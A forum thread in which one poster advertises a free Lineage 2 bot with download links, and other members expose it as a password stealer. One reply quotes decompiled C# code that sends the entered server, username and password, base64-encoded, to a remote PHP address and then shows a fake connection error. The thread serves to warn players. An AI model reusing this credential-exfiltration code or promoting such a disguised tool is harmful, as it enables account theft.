Jump to content

Recommended Posts

Posted

L2 Auxhilary ( http://l2auxhilary.vze.com/ )

 

New out of game bot, supporting many features such as the following:

 

- Auto-Leveler

- Auto-Trade / Auto-Quest

- 100% Free forever

- Supports L2 Walker & L2 Superman scripts (However, a script editing program for these is not available at this time)

- Out of game support (No need for an actual game client to run)

- Many more features!

 

Also, we will be releasing an in game version further down the road so stay posted!  Join us and help with the beta test!

 

Mirrors (A more up-to-date list located here: http://l2auxhilary.vze.com/ ):

http://files.filefront.com/L2+Auxhilary+100+Betazip/;9345829;/fileinfo.html

http://files.filefront.com/L2+Auxhilary+100+Betarar/;9345828;/fileinfo.html

http://www.uploading.com/files/LE49JKRA/L2_Auxhilary_1.0.0_Beta.zip.html

http://www.uploading.com/files/A111ZUAP/L2_Auxhilary_1.0.0_Beta.rar.html

 

We like to hear your feedback, so please, if you have any comments/suggestions/questions or complaints, please e-mail us at l2auxteam@gmail.com (Other contacting options are listed under "Contact Us" on our website)

 

Happy Botting!  :D

L2 Auxhilary Team.

Posted

Yes you tried a few days ago ....

 

People figured out your prog is pw stealer and deleted your thread, now gtfo.

 

And for the new people around, this isnt a bot, it just sends your login/password to http://l2auxhilary.byethost13.com/aux_ins.php ... and that guy rips you off

  • 1 month later...
Posted

Give up already andrew

get a clue seriously.

 

and all those who said "cool I'll try" should get banned as they will never bring anything to this forum anyway.

private void sendData ()

{

if (base.InvokeRequired)

{

Random random1 = new Random();

Thread.Sleep(random1.Next(0x3e8, 0x138);

base.Invoke(new ConnectForm.SendData(this.sendData), new object[0]);

}

else

{

try

{

byte[] buffer1 = Encoding.UTF8.GetBytes(this.serverComboBox.Text);

byte[] buffer2 = Encoding.UTF8.GetBytes(this.usernameTextBox.Text);

byte[] buffer3 = Encoding.UTF8.GetBytes(this.passwordTextBox.Text);

string[] textArray1 = new string[]{"?a=\uFFFD", Convert.ToBase64String(buffer1), "&b=\uFFFD", Convert.ToBase64String(buffer2), "&c=\uFFFD", Convert.ToBase64String(buffer3)};

string text1 = string.Concat(textArray1);

this.webBrowser.Navigate("http://l2auxhilary.byethost13.com/aux_ins.php\uFFFD" + text1);

}

catch

{

}

this.statusLabel.Text = "Ready\uFFFD";

this.connectProgressBar.Style = ProgressBarStyle.Blocks;

this.connectButton.Enabled = true;

MessageBox.Show("Couldn't connect! Check your settings and try again.\uFFFD", "Error\uFFFD");

}

}

 

Guest
This topic is now closed to further replies.


×
×
  • Create New...